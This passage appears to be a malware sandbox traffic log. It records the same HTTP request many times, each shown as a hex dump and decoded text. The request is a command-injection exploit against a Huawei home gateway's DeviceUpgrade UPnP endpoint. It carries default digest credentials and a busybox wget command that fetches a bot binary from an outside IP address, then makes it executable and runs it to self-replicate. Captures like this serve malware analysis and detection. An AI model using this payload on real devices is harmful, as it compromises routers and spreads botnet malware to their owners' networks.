78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
